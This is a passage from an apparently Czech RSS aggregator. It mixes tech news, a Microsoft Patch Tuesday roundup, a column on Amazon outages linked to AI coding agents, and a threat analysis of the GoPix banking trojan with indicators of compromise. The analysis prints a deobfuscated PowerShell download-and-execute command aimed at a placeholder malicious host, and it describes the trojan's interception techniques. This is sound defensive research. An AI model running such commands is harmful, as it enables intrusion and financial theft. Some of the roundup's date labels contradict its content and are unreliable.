Agregátor RSS

Some weeks in security feel normal. Then you read a few tabs and get that immediate “ah, great, we’re doing this now” feeling. This week has that energy. Fresh messes, old problems getting sharper, and research that stops feeling theoretical real fast. A few bits hit a little too close to real life, too. There’s a good mix here: weird abuse of trusted stuff, quiet infrastructure ugliness, Ravie Lakshmananhttp://www.blogger.com/profile/[email protected]

Shadow AI is quietly spreading across SaaS environments as employees adopt new AI tools without IT oversight. Nudge Security explains how security teams can discover AI apps, monitor usage, and govern risky AI activity. [...]

Nový Toughbook 56 má poprvé displej s poměrem stran 16:10 • Poprvé u této řady odolných notebooků vidíme i snadné otevírání víka. • Toughbook láká také na výkon, vysoký jas a rychlé sítě.

Vědci z univerzity La Sapienza v Římě vyvinuli systém, který dokáže identifikovat jednotlivce pouze na základě toho, jak narušují signály Wi-Fi. Autoři tuto novou technologii nazvali WhoFi. Na rozdíl od tradičních biometrických systémů, jako jsou skenery otisků prstů a rozpoznávání obličeje, nevyžaduje tato metoda přímý fyzický kontakt ani vizuální vstupy. WhoFi může také sledovat jednotlivce na větší ploše než kamera s pevnou polohou; stačí, je-li k dispozici Wi-Fi síť.

​Microsoft has removed the Samsung Galaxy Connect app from the Microsoft Store because it was causing issues on specific Samsung Galaxy Book 4 and desktop models running Windows 11. [...]

Back button blunder in WebFiling service run by Companies House revealed confidential paperwork

Companies House was forced to pull down its record-filing platform for the entire weekend to rectify a "security issue" that exposed the personal details of company directors and other data to any logged in users.…

Long before Taco Tuesday became part of the pop-culture vernacular, Tuesdays were synonymous with security — and for anyone in the tech world, they still are.  Patch Tuesday, as you most likely know, refers to the day each month when Microsoft releases security updates and patches for its software products — everything from Windows to Office to SQL Server, developer tools to browsers.

The practice, which happens on the second Tuesday of the month, was initiated to streamline the patch distribution process and make it easier for users and IT system administrators to manage updates.  Like tacos, Patch Tuesday is here to stay.

In a blog post celebrating the 20th anniversary of Patch Tuesday, the Microsoft Security Response Center wrote: “The concept of Patch Tuesday was conceived and implemented in 2003. Before this unified approach, our security updates were sporadic, posing significant challenges for IT professionals and organizations in deploying critical patches in a timely manner.”

Patch Tuesday will continue to be an “important part of our strategy to keep users secure,” Microsoft said, adding that it’s now an important part of the cybersecurity industry.  As a case in point, Adobe, among others, follows a similar patch cadence.

Patch Tuesday coverage has also long been a staple of Computerworld’s commitment to provide critical information to the IT industry. That’s why we’ve gathered together this collection of recent patches, a rolling list we’ll keep updated each month.

In case you missed a recent Patch Tuesday announcement, here are the latest six months of updates.

For March, Patch Tuesday delivers fixes for 83 vulnerabilities

Microsoft’s March Patch Tuesday release addresses 83 vulnerabilities across Windows, Office, SQL Server, Azure, and .NET — with two publicly disclosed zero-days affecting SQL Server and .NET (though neither is being actively exploited in the wild.) Six additional vulnerabilities spanning the Windows Kernel, Graphics Component, SMB Server, Accessibility Infrastructure, and Winlogon are flagged as “Exploitation More Likely.”

The most significant change this month is the introduction of Common Log File System (CLFS) hardening with signature verification, which will affect how Windows handles log files across the operating system. More info on Microsoft Security updates for March 2025.

February’s Patch Tuesday release fixes 59 flaws, including 6 being exploited

The company’s Patch Tuesday release for February addresses 59 CVEs across the company’s product family — roughly half the volume of January’s 159 patches. Six vulnerabilities, affecting Windows Shell, MSHTML, Desktop Window Manager, Remote Desktop, Remote Access, and Microsoft Word, are already being actively exploited. (All five Critical-rated CVEs target Azureservices rather than Windows, however.) 

Both Windows and Office get a “Patch Now” recommendation, with CISA setting a March 3 enforcement deadline for all six exploited vulnerabilities. Two new enforcement timelines also take effect in April: Kerberos RC4 deprecation (CVE-2026-20833) and Windows Deployment Services hardening (CVE-2026-0386). More info on Microsoft Security updates for February 2026.

For January, Patch Tuesday starts off with a bang

The first Patch Tuesday release of 2026 addresses 112 CVEs across Microsoft’s product portfolio, including eight rated critical and three zero-day vulnerabilities. One zero-day (CVE-2026-20805), an information disclosure flaw in the Desktop Window Manager, is already under active exploitation, prompting CISA to add it to the Known Exploited Vulnerabilities catalog with a remediation deadline of Feb. 3, 2026. (Note: 95 of the vulnerabilities affect Windows.) More info on Microsoft Security updates for January 2025.

Ho ho ho! December’s Patch Tuesday delivers three zero-days

The December Patch Tuesday update addresses three zero-days (CVE-2025-64671, CVE-2025-54100, and CVE-2025-62221) but includes surprisingly few total patches (just 57). Notably, Microsoft has not published any critical updates for the Windows platform this month. That said, given the zero-days, we recommend a “Patch Now” release schedule for Windows and Microsoft Office. More info on Microsoft Security updates for December 2025.

Be thankful: November’s Patch Tuesday has just one zero-day

This November Patch Tuesday release offers a much reduced set of updates, with just 63 Microsoft patches and (only) one zero-day (CVE-2025-62215) affecting the Windows desktop platform. Windows desktops this month require a “Patch Now” plan, and while the severity of these security vulnerabilities is less than it was in October, the testing requirements are still extensive. More info on Microsoft Security updates for November 2025.

For October’s Patch Tuesday, a scary number of fixes

Microsoft this week released 175 updates affecting Windows and Office and .NET, including server-based updates for Microsoft SQL Server and Exchange server. There are also four zero-day fixes (CVE-2025-24052, CVE-2025-24990, CVE-2025-2884 and CVE-2025-59230), leading to a “Patch Now” recommendation for Windows.

General support for Windows 10 ended Oct. 14, with Microsoft advising: “At this point technical assistance, feature updates and security updates are no longer provided. If you have devices running Windows 10, we recommend upgrading them to Windows 11.” More info on Microsoft Security updates for October 2025.

If you run security at any reasonably complex organization, your validation stack probably looks something like this: a BAS tool in one corner. A pentest engagement, or maybe an automated pentesting product, in another. A vulnerability scanner feeding an attack surface management platform somewhere else. Each tool gives you a slice of the picture. None of them talks to each other in any [email protected]

Microsoft spouští Copilot Cowork postavený na technologii Claude Cowork. • Agentická AI má přístup k e-mailům, kalendáři, dokumentům a chatům. • Tato AI už pouze neradí, ale skutečně pracuje a tvoří výsledky na žádost uživatele.

Three different ClickFix campaigns have been found to act as a delivery vector for the deployment of a macOS information stealer called MacSync. "Unlike traditional exploit-based attacks, this method relies entirely on user interaction – usually in the form of copying and executing commands – making it particularly effective against users who may not appreciate the implications of running Ravie Lakshmananhttp://www.blogger.com/profile/[email protected]

Businesses love that they can use AI to replace those pesky, expensive developers. For example, Atlassian just laid off 10% of its workers, about 1,600 jobs, to throw more money into AI. Block (formerly Square) CEO Jack Dorsey recently announced he was cutting 4,000 jobs, almost 40% of the company’s staff, saying the intelligence tools we’re creating and using…”are enabling a new way of working which fundamentally changes what it means to build and run a company.” 

New? I think not. Businesses have been firing people to become more profitable since Ea-nāṣir of Ur let his copper quality assurance engineer go.

What’s that — AI is different, you say? It really contributes to a business’s bottom line while maintaining high standards. But does it, really? Let’s check in over at Amazon to see how AI is working there.

First, Amazon, like so many other companies, is laying people off left and right — 30,000 so far in the last six months. “This generation of AI is the most transformative technology we’ve seen since the Internet, and it’s enabling companies to innovate much faster than ever before,” wrote Beth Galetti, Amazon’s senior vice president of People Experience and Technology. This means Amazon could “be organized more leanly.” 

In plain English, that means they’re firing people.

Amazon might yet regret that move. Multiple Amazon Web Services (AWS) and Amazon retail outages have prompted an internal crackdown on how generative AI (genAI) is allowed to touch production code. What’s’ that line about the horse and the barn door?

It started in mid‑December, when an internal AWS AI coding agent called Kiro was allowed to make live changes to a customer‑facing cost management system. Kiro decided the best fix was to “delete and recreate the environment,” triggering a roughly 13‑hour outage that hit the AWS Cost Explorer service in parts of mainland China.

Amazon has insisted the root cause was “user error” and misconfigured access controls. They argued that the same problem could have happened with any developer tool, not just AI. Internally, AWS characterized the disruption as “extremely limited,” stressing that core compute, storage, database, and AI services were not affected.

That could be true. People have been making mistakes and writing sloppy code long before AI got into the programming mix. 

But (surprise!) the December failure wasn’t an isolated case. There have been at least two production outages in recent months, where Amazon AI coding tools can take some of the blame. Internally, those outages were described as “small but entirely foreseeable.”

The root cause was that AI was effectively treated as an extension of a human operator and granted operator‑level permissions. That’s just stupid. You never give someone —or something — system administration privileges unless they absolutely need it and you completely trust them. Neither was true in this case. So, it was that this combination of high privileges and no supervision blew up.

Amazon insists it was human error. Yes, it was. The error was humans putting too much trust in AI. This will only happen more and more often as we replace people who know what they’re doing with often clueless AI agents and bots.

But, wait! There’s more. AI failures have spread beyond AWS infrastructure to Amazon’s retail storefront. In early March, multiple AI-assisted blunders resulted in four — count ’em four! — major incidents. One led to a six-hour outage.

Amazon had had enough. Amazon Senior Vice President Dave Treadwell acknowledged that “GenAI tools supplement or accelerate production change instructions, leading to unsafe practices.”  Why? Amazon AI safeguards “are not yet fully established.”

You know, maybe it’s just me, but before firing a ton of people, I’d make sure that 1) AI could do their jobs and 2) I had a way of ensuring that I could spot, track, and repair AI errors before things go awry. You know, safeguards.

For now, Amazon has a new AI rule for the next 90 days: junior and mid-level engineers now need senior sign-off on any AI-assisted production changes. They’ll also be resetting their code practices and re‑emphasizing traditional safeguards. Engineers in the e‑commerce group have been told to attend normally optional weekly meetings focused on recent outages and new rules around generative‑AI‑driven deployments.

Publicly, Amazon has pushed back against the narrative that AI agents themselves “caused” the outages. Instead, it has been reframing these failures as classic access-control and process failures. Company spokespeople have repeatedly said the incidents were user error and coincidence, stressing that they have “no evidence” that AI tools make mistakes more often than traditional software developers.

Amazon’s top brass is missing the point. Of course, humans must take the blame. If Amazon executives had a clue, they might recall that back in 1979, an IBM training manual stated, “A computer can never be held accountable, therefore a computer must never make a management decision.” Unfortunately, from the top down, Amazon is insisting that AI be used even when, as has become apparent, it doesn’t work that well.

Amazon’s engineers know that. They’ve told The Guardian that they must use AI and “that we have to go faster, this will make us go faster, and that speed is the number one priority.” The result according to another Amazon employee is “This pressure to use [AI] has resulted in worse quality code, but also just more work for everyone.”

How does the saying go? Oh yeah, “You can have two out of three: fast, cheap, or good.” For Amazon AI may be fast and cheap, but it’s failing to be good. 

To get true productivity out of AI, you need to double and triple check its work. This is a lesson that not only Amazon needs to learn, but all businesses suffering from the hallucination that AI is ready to replace programmers. 

It’s not. It’s that simple.

Zatímco historie raket na tuhé palivo sahá až do středověké Číny 13. století, kapalný pohon je mnohem mladší. Dnes si připomínáme rovných sto let od prvního letu zařízení Nell na tekutý kyslík a benzín. Postavil jej raketový průkopník Robert H. Goddard a poprvé vzlétlo 16. března roku 1926 z farmy ...

Introduction

GoPix is an advanced persistent threat targeting Brazilian financial institutions’ customers and cryptocurrency users. It represents an evolved threat targeting internet banking users through memory-only implants and obfuscated PowerShell scripts. It evolved from the RAT and Automated Transfer System (ATS) threats that were used in other malware campaigns into a unique threat never seen before. Operating as a LOLBin (Living-off-the-Land Binary), GoPix exemplifies a sophisticated approach that integrates malvertising vectors via platforms such as Google Ads to compromise prominent financial institutions’ customers.

Our extensive analysis reveals GoPix’s capabilities to execute man-in-the-middle attacks, monitor Pix transactions, Boleto slips, and manipulate cryptocurrency transactions. The malware strategically bypasses security measures implemented by financial institutions while maintaining persistence and employing robust cleanup mechanisms to challenge Digital Forensics and Incident Response (DFIR) efforts.

GoPix has reached a level of sophistication never before seen in malware originating in Brazil. It’s been over three years since we first identified it, and it remains highly active. The threat is recognized for its stealthy methods of infecting victims and evading detection by security software, using new tricks to stay operable.

The threat differs in its behavior from the RATs already seen in other Brazilian families, such as Grandoreiro. GoPix uses C2s with a very short lifespan, which stay online only for a few hours. In addition, the attackers behind this threat abuse legitimate anti-fraud and reputation services to perform targeted delivery of its payload and ensure that they have not infected a sandbox or system used in analysis. They handpick their victims, financial bodies of state governments and large corporations.

The campaign leverages a malvertisement technique which has been active since December 2022. The strategic use of multiple obfuscation layers and a stolen code signing certificate showcases GoPix’s ability to evade traditional security defenses and steal and manipulate sensitive financial data.

The Brazilian group behind GoPix is clearly learning from APT groups to make malware persistent and hide it, loading its modules into memory, keeping few artifacts on disk, and making hunting with YARA rules ineffective for capturing them. The malware can also switch between processes for specific functionalities, potentially disabling security software, as well as executing a man-in-the-middle attack with a previously unseen technique.

Initial infection

Initial infection is achieved through malvertising campaigns. The threat actors in most cases use Google Ads to spread baits related to popular services like WhatsApp, Google Chrome, and the Brazilian postal service Correios and lure victims to malicious landing pages.

We have been monitoring this threat since 2023, and it continues to be very active for the time being.

GoPix malware campaign detections (download)

The initial infection vector is shown below:

Initial infection vector

When the user ends up on the GoPix landing page, the malware abuses legitimate IP scoring systems to determine whether the user is a target of interest or a bot running in malware analysis environments. The initial scoring is done through a legitimate anti-fraud service, with a number of browser and environment parameters sent to this service, which returns a request ID. The malicious website uses this ID to check whether the user should receive the malicious installer or be redirected to a harmless dummy landing page. If the user is not considered a valuable target, no malware is delivered.

Website shown if the user is detected as a bot or sandbox

However, if the victim passes the bot check, the malicious website will query the check.php endpoint, which will then return a JSON response with two URLs:

JSON response from a malicious endpoint

The victim will then be presented with a fake webpage offering to download advertised software, this being the malicious “WhatsApp Web installer” in the case at hand. To decide which URL the victim will be redirected to, another check happens in the JavaScript code for whether the 27275 port is open on localhost.

WebSocket request to check if the port is open

This port is used by the Avast Safe Banking feature, present in many Avast products, which are very popular in countries like Brazil. If the port is open, the victim is led to download the first-stage payload from the second URL (url2). It is a ZIP file containing an LNK file with an obfuscated PowerShell designed to download the next stage. If the port is closed, the victim is redirected to the first URL (url), which offers to download a fake WhatsApp executable NSIS installer.
At first, we thought this detection could lead the victim to a potential exploit. However, during our research, we discovered that the only difference was that if Avast was installed, the victim was led to another infection vector, which we describe below.

Malware delivered through a malicious website

Infection chain First-stage payload

If no Avast solution is installed, an executable NSIS installer file is delivered to the victim’s device. The attackers change this installer frequently to avoid detection. It’s digitally signed with a stolen code signing certificate issued to “PLK Management Limited”, also used to sign the legitimate “Driver Easy Pro” software.

Stolen certificate used to sign the malicious installer

The purpose of the NSIS installer is to create and run an obfuscated batch file, which will use PowerShell to make a request to the malicious website for the next-stage payload.

NSIS installer code creating a batch file

However, if the 27275 port is open, indicating the victim has an Avast product installed, the infection happens through the second URL. The victim is led to download a ZIP file with an LNK file inside. This shortcut file contains an obfuscated command line.

Obfuscated command line inside the LNK

Deobfuscated command line:

WindowsPowerShell\v10\powershell (New-Object NetWebClient)UploadString("http://MALICIOUS/1/","tHSb")|$env:E -

The purpose of this command line is to download and execute the next-stage payload from the malicious URL referenced above.

It’s highly likely this method is used because Avast Safe Browser blocks direct downloads of executable files, so instead of downloading the executable NSIS installer, a ZIP file is delivered.

Once the PowerShell command from either the LNK or EXE file is executed, GoPix executes yet another obfuscated PowerShell script that is remotely retrieved (in the GoPix downloader image below, it’s defined as “PowerShell Script”).

GoPix delivery chain

Initial PowerShell script

This script’s purpose is to collect system information and send it to the GoPix C2. Upon doing so, the script obtains a JSON file containing GoPix modules and a configuration that is saved on the victim’s computer.

System information collection

The information contained within this JSON is as follows:

• Folder and file names to be created under the %APPDATA% directory
• Obfuscated PowerShell script
• Encrypted PowerShell script ps
• Malicious code implant sc containing encrypted GoPix dropper shellcode, GoPix dropper, main payload shellcode and main GoPix implant
• GoPix configuration file pf

Once these files are saved, an additional batch file is also created and executed. Its purpose is to launch the obfuscated PowerShell script.

PSExecutionPolicyPreference=Unrestricted powershell -File "$scriptPath" exit

Obfuscated PowerShell script

Upon execution, the obfuscated PowerShell script decrypts the encrypted PowerShell script ps, starts another PowerShell instance, and passes the decrypted script through its stdin, so that the decrypted script is never loaded to disk.

Deobfuscated PowerShell script

Decrypted PowerShell script “ps”

The purpose of this memory-only PowerShell script is to perform an in-memory decryption of the GoPix dropper shellcode, GoPix dropper, main payload shellcode and main GoPix malware implant into allocated memory. After that, it creates a small piece of shellcode within the PowerShell process to jump to the GoPix dropper shellcode previously decrypted.

PowerShell script shellcode jumps to the malware loader shellcode

The GoPix dropper shellcode is built for either the x86 or x64 architecture, depending on the victim’s computer.

Building the GoPix shellcode depending on the targeted architecture

Shellcode

This shellcode is bundled with the malware and stays in encrypted form on disk. It is utilized at two separate stages of the infection chain: first to launch the GoPix dropper and subsequently to execute the main GoPix malware. We’ve observed two versions of this shellcode. The main difference is the old one resolves API addresses by their names, while the latest one employs a hashing algorithm to determine the address of a given API. The API hash calculation begins by generating a hash for the DLL name, and this resulting hash is then used within the function name to compute the final API hash.

The old sample (left) used stack strings with API names. The new sample (right) uses the API hashing obfuscation technique

The first time GoPix is dropped into memory through PowerShell, its structure is as follows:

1. Memory dropper shellcode
2. Memory dropper DLL
3. Main payload shellcode
4. Main payload DLL

Both DLLs have their MZ signature erased, which helps to evade detection by memory dumping tools that scan for PE files in memory.

MZ signature zeroed

GoPix dropper

When the main function from the dropper is called, it verifies if it is running within an Explorer.exe process; if not, it will terminate. It then sequentially checks for installed browsers — Chrome, Firefox, Edge, and Opera — retrieving the full path of the first detected browser from the registry key SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths. A significant difference from previously analyzed droppers is that this version encrypts each string using a unique algorithm.

After selecting the browser, the dropper uses direct syscalls to launch the chosen browser process in a suspended state. This allows it to inject the main GoPix shellcode and its parameters into the process. The injected shellcode is tasked with extracting and loading the main GoPix implant directly into memory, subsequently calling its exported main function. The parameters passed include the number 1, to trigger the main GoPix function, and the current Process ID, which is that of Explorer.exe.

The dropper uses a syscall instruction and calls the GoPix in-memory implant’s main function

Main GoPix implant Clipboard stealing functionality

Boleto bancário was added as one of the targets to the malware’s clipboard stealing and replacing feature. Boleto is a popular payment method in Brazil that functions similarly to an invoice, being the second most popular payment system in the country. It is a standardized document that includes important payment information such as the amount due, due date, and details of the payee. It features a typeable line, which is a sequence of numbers that can be entered in online banking applications to pay. This line is what GoPix targets with its functionality. An example of such a line is “23790.12345 60000.123456 78901.234567 8 76540000010000”.

Boleto bancário targeted in clipboard-stealing functionality

When GoPix detects a Pix or Boleto transaction, it simply sends this information to the C2. However, when a Bitcoin or Ethereum wallet is copied to the clipboard, the malware replaces the address with one belonging to the threat actor.

Unique man-in-the-middle attack

PAC (Proxy AutoConfig) files are nothing new; they’ve been used by Brazilian criminals for over two decades, but GoPix takes this to another level. While in the past, criminals used PAC files to redirect victims to a fake phishing page, the purpose of the PAC file in GoPix attacks is to manipulate the traffic while the user navigates the legitimate financial website.

In order to hide which site GoPix wants to intercept, it uses a CRC32 algorithm in the host field of the PAC file. It is formatted on the fly using a pf configuration file: the items in it determine which proxy the victim will be redirected to. To hide its malicious proxy server, once a connection is opened to the proxy server, the malware enumerates all connections and finds the process that initiated it. It then takes the process executable name CRC32C checksum and compares it with a hardcoded list of browsers’ CRC checksums. If it doesn’t match a known browser, the malware simply terminates the connection.

PAC file excerpt

To uncover GoPix targets, we compiled a list of many Brazilian financial institution domains and subdomains, computed their CRC32 checksums, and compared them against GoPix hardcoded values. The table below shows each CRC32 and its target.

CRC32 Target 8BD688E8 local 8CA8ACFF www2.banco********.com.br AD8F5213 autoatendimento.********.com.br 105A3F17 www2.****.com.br B477FE70 internetbanking.*******.gov.br 785F39C2 loginx.********.br C72C8593 internetpf.*****.com.br 75E3C3BA internet.*****.com.br FD4E6024 internetbanking.*******.com.br HTTPS interception

Since every communication is encrypted via HTTPS, GoPix bypasses this by injecting a trusted root certificate into the memory of a web browser while on the victim’s machine. This allows the attacker to sniff and even manipulate the victim’s traffic. We have found two certificates across GoPix samples, one that expired in January 2025 and another created in February 2025 that is set to expire in February 2027.

GoPix trusted root certificate

Conclusion

With the ability to load its memory-only implant that employs a malicious Proxy AutoConfig (PAC) file and an HTTP server to execute an unprecedented man-in-the-middle attack, GoPix is by far the most advanced banking Trojan of Brazilian origin. The injection of a trusted root certificate into the browser enhances its ability to intercept and manipulate sensitive financial data while maintaining its stealth profile, as the malicious certificate is not visible to operating system tools. Additionally, GoPix has expanded its clipboard monitoring capability by adding Boleto slips to its arsenal, which already includes Pix transactions and cryptowallets addresses.

This is a sophisticated threat, with multiple layers of evasion, persistence, and functionality. The investigation into the malware’s shellcode, dropper, and main module uncovered intricate mechanisms, including process jumping to leverage specific functionalities across processes. This technique, combined with robust string encryption methods applied to both the dropper and main payload, indicates that the threat actor has gone to great lengths to hinder detection. Interestingly enough, attackers adopted the use of a legitimate commercial anti-fraud service to pre-qualify their targets, aiming to avoid sandboxes and security researchers’ investigations. Additionally, the persistence and cleanup mechanisms implemented by the malware enhance its durability during incident response efforts, with very short C2 lifespans.

For further information on GoPix and all technical details, please contact [email protected].

Kaspersky’s products detect this threat as HEUR:Trojan-Banker.Win64.GoPix, Trojan.PowerShell.GoPix, and HEUR:Trojan-Banker.OLE2.GoPix.

Indicators of compromise

EB0B4E35A2BA442821E28D617DD2DAA2 – NSIS installer
C64AE7C50394799CE02E97288A12FFF – ZIP archive with an LNK file
D3A17CB4CDBA724A0021F5076B33A103 – Malware dropper
28C314ACC587F1EA5C5666E935DB716C – Main payload

Malicious Certificate Thumbprint
<Name(CN=Root CA 2024)> f110d0bd7f3bd1c7b276dc78154dd21eef953384
<Name(CN=Root CA 2025)> 1b1f85b68e6c9fde709d975a186185c94c0faa51

C2
paletolife[.]com

Domains and IPs
https://correioez0ubcfht9i3.lovehomely[.]com/
https://correiotwknx9gu315h.lovehomely[.]com/
http://webmensagens4bb7[.]com/
https://mydigitalrevival[.]com/get.php
http://b3d0[.]com/1/
http://4a3d[.]com/1/
http://9de1[.]com/1/
http://ef0h[.]com/1/
http://yogarecap[.]com/1/

Ukrainian entities have emerged as the target of a new campaign likely orchestrated by threat actors linked to Russia, according to a report from S2 Grupo's LAB52 threat intelligence team. The campaign, observed in February 2026, has been assessed to share overlaps with a prior campaign mounted by Laundry Bear (aka UAC-0190 or Void Blizzard) aimed at Ukrainian defense forces with a malware Ravie Lakshmananhttp://www.blogger.com/profile/[email protected]

Zdánlivé zastavení růstu cen DDR5 v předjaří byl nejspíš jen krátkodobý záchvěv. Ceny DRAM dále porostou, i když už jen v řádu nižších desítek procent. NAND (a tedy i SSD) však zdraží výrazněji…

Oscaři 2026 jsou rozdáni a letošní ročník přinesl několik velkých favoritů i překvapení. Nejvíce sošek si odneslo drama Jedna bitva za druhou Paula Thomase Andersona, výrazně uspěl také film Hříšníci nebo animák KPop Demon Hunters. Českou stopu nese dokument Pan Nikdo proti Putinovi, který získal ...

HP Smart Tank Wireless 582 zlevnila na 1990 Kč, když využijete cashback výrobce. • Používá tankový systém s nízkými provozními náklady. • Tiskne kvalitně, dostatečně rychle a bonusem je tříletá záruka.